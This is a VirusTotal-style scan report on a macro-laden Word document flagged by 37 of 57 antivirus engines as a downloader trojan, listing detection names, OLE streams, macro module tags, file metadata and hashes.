× Cookies are disabled! This site requires cookies to be enabled to work properly
SHA256: d2a4c536d271fb9a636c0e820787e428994cf58fe8cac988ef190fc94889a994
File name: 8e2f6ab95628fa0e3e8c7d61ec6659e0
Detection ratio: 37 / 57
Analysis date: 2016-06-03 14:10:00 UTC ( 9 months, 3 weeks ago )
Antivirus Result Update
Ad-Aware W97M.Downloader.QB 20160603
AegisLab Troj.Downloader.Vbs.Agent!c 20160603
AhnLab-V3 W97M/Downloader 20160603
ALYac W97M.Downloader.QB 20160603
Antiy-AVL Trojan[Downloader]/VBS.Agent.amh 20160603
Arcabit HEUR.VBA.Trojan.d 20160603
Avast MO97:Downloader-TY [Trj] 20160603
AVG Script/PDF.Exploit.C 20160603
Avira (no cloud) W2000M/Agent.073338 20160603
AVware LooksLike.Macro.Malware.gen!d5 (v) 20160603
Baidu VBA.Trojan-Downloader.Agent.do 20160603
BitDefender W97M.Downloader.QB 20160603
CAT-QuickHeal W97M.Dropper.EY 20160603
Cyren W97M/Downloader.CI 20160603
DrWeb W97M.DownLoader.326 20160603
Emsisoft W97M.Downloader.QB (B) 20160603
ESET-NOD32 VBA/TrojanDownloader.Agent.PC 20160603
F-Prot W97M/Downloader.CI 20160603
F-Secure Trojan-Downloader:W97M/Dridex.R 20160603
Fortinet WM/Agent.PC!tr 20160603
GData W97M.Downloader.QB 20160603
Ikarus Trojan-Downloader.VBA.Agent 20160603
Kaspersky Trojan-Downloader.VBS.Agent.amh 20160603
McAfee W97M/Downloader.agm 20160603
McAfee-GW-Edition W97M/Downloader.agm 20160603
Microsoft TrojanDownloader:W97M/Adnel.D 20160603
eScan W97M.Downloader.QB 20160603
NANO-Antivirus Trojan.Script.Agent.druync 20160603
nProtect W97M.Downloader.QB 20160603
Panda W97M/Downloader 20160603
Qihoo-360 heur.macro.download.g 20160603
Sophos Troj/DocDl-MJ 20160603
Symantec W97M.Downloader 20160603
Tencent Vbs.Trojan-downloader.Agent.Lork 20160603
TrendMicro W2KM_DLOADR.JCZ 20160603
TrendMicro-HouseCall W2KM_DLOADR.JCZ 20160603
VIPRE LooksLike.Macro.Malware.gen!d5 (v) 20160603
Alibaba 20160603
Baidu-International 20160603
Bkav 20160603
ClamAV 20160603
CMC 20160602
Comodo 20160603
Jiangmin 20160603
K7AntiVirus 20160603
K7GW 20160603
Kingsoft 20160603
Malwarebytes 20160603
Rising 20160603
SUPERAntiSpyware 20160603
TheHacker 20160602
TotalDefense 20160603
VBA32 20160603
ViRobot 20160603
Yandex 20160602
Zillya 20160603
Zoner 20160603
The file being studied follows the Compound Document File format! More specifically, it is a MS Word Document file.
Commonly abused properties
The studied file makes use of macros, a macro is a series of commands and instructions that you group together as a single command to accomplish a task automatically. Macros are often abused to perform malicious tasks when working with a document.
May open a file.
May write to a file.
May perform operations with other files.
May create OLE objects.
May execute code from Dynamically Linked Libraries.
Seems to contain deobfuscation code.
Summary
last_author
GN
creation_datetime
2015-04-24 10:17:00
template
Normal.dot
author
1
page_count
1
last_saved
2015-04-24 10:17:00
revision_number
2
application_name
Microsoft Office Word
code_page
Cyrillic
Document summary
line_count
1
version
730895
paragraph_count
1
code_page
Cyrillic
OLE Streams
name
Root Entry
clsid
00020906-0000-0000-c000-000000000046
type_literal
root
clsid_literal
MS Word
sid
0
size
11264
type_literal
stream
size
113
name
\x01CompObj
sid
19
type_literal
stream
size
4096
name
\x05DocumentSummaryInformation
sid
4
type_literal
stream
size
4096
name
\x05SummaryInformation
sid
3
type_literal
stream
size
4124
name
1Table
sid
1
type_literal
stream
size
740
name
Macros/PROJECT
sid
18
type_literal
stream
size
182
name
Macros/PROJECTwm
sid
17
type_literal
stream
size
4340
type
macro
name
Macros/VBA/AMOS
sid
14
type_literal
stream
size
6016
type
macro
name
Macros/VBA/CLAY
sid
9
type_literal
stream
size
4960
type
macro
name
Macros/VBA/CORNELIUS
sid
11
type_literal
stream
size
3220
type
macro
name
Macros/VBA/DEXTER
sid
13
type_literal
stream
size
5854
type
macro
name
Macros/VBA/LAMAR
sid
12
type_literal
stream
size
3706
type
macro
name
Macros/VBA/PERCY
sid
8
type_literal
stream
size
6529
type
macro
name
Macros/VBA/ROLANDO
sid
10
type_literal
stream
size
2095
type
macro
name
Macros/VBA/ThisDocument
sid
7
type_literal
stream
size
8176
name
Macros/VBA/_VBA_PROJECT
sid
15
type_literal
stream
size
1062
name
Macros/VBA/dir
sid
16
type_literal
stream
size
4151
name
WordDocument
sid
2
Macros and VBA code streams
[+] ThisDocument.cls Macros/VBA/ThisDocument 84 bytes
[+] PERCY.bas Macros/VBA/PERCY 665 bytes
exe-pattern create-ole open-file run-dll
[+] CLAY.bas Macros/VBA/CLAY 1301 bytes
exe-pattern run-dll
[+] ROLANDO.bas Macros/VBA/ROLANDO 1738 bytes
handle-file open-file write-file
[+] CORNELIUS.bas Macros/VBA/CORNELIUS 889 bytes
exe-pattern obfuscated run-dll
[+] LAMAR.bas Macros/VBA/LAMAR 1442 bytes
exe-pattern run-dll
[+] DEXTER.bas Macros/VBA/DEXTER 620 bytes
create-ole
[+] AMOS.bas Macros/VBA/AMOS 746 bytes
exe-pattern run-dll
ExifTool file metadata
SharedDoc
No

Author
1

CodePage
Windows Cyrillic

LinksUpToDate
No

LastModifiedBy
GN

HeadingPairs
, 1

Template
Normal.dot

CharCountWithSpaces
0

CreateDate
2015:04:24 09:17:00

CompObjUserType
???????? Microsoft Office Word

ModifyDate
2015:04:24 09:17:00

HyperlinksChanged
No

Characters
0

ScaleCrop
No

RevisionNumber
2

MIMEType
application/msword

Words
0

FileType
DOC

Lines
1

AppVersion
11.9999

Security
None

Software
Microsoft Office Word

TotalEditTime
0

Pages
1

CompObjUserTypeLen
31

FileTypeExtension
doc

Paragraphs
1

File identification
MD5 ab8401a01ac23ee85f768b50290dcb46
SHA1 115fe1409c72ba93060c564c9583929d9483324c
SHA256 d2a4c536d271fb9a636c0e820787e428994cf58fe8cac988ef190fc94889a994
ssdeep
768:9ZTQgKc5vlhV7hTSKL6mUtb2aTe4CHhGEwQzNqZVs:75KcNlkKLg2YGNU

File size 69.0 KB ( 70656 bytes )
File type MS Word Document
Magic literal
CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 1, Template: Normal.dot, Last Saved By: GN, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Apr 23 09:17:00 2015, Last Saved Time/Date: Thu Apr 23 09:17:00 2015, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0

TrID Microsoft Word document (80.0%)
Generic OLE2 / Multistream Compound File (20.0%)
Tags
obfuscated open-file exe-pattern handle-file doc macros run-dll write-file create-ole

VirusTotal metadata
First submission 2015-04-24 09:44:50 UTC ( 1 year, 11 months ago )
Last submission 2015-05-01 22:30:05 UTC ( 1 year, 10 months ago )
File names 8e2f6ab95628fa0e3e8c7d61ec6659e0
Western_Order.doc
a5209723483fdc082219fb49699b7171
Western Order.doc
No comments. No VirusTotal Community member has commented on this item yet, be the first one to do so!

Leave your comment...

?
Post comment

You have not signed in. Only registered users can leave comments, sign in and have a voice!

No votes. No one has voted on this item yet, be the first one to do so!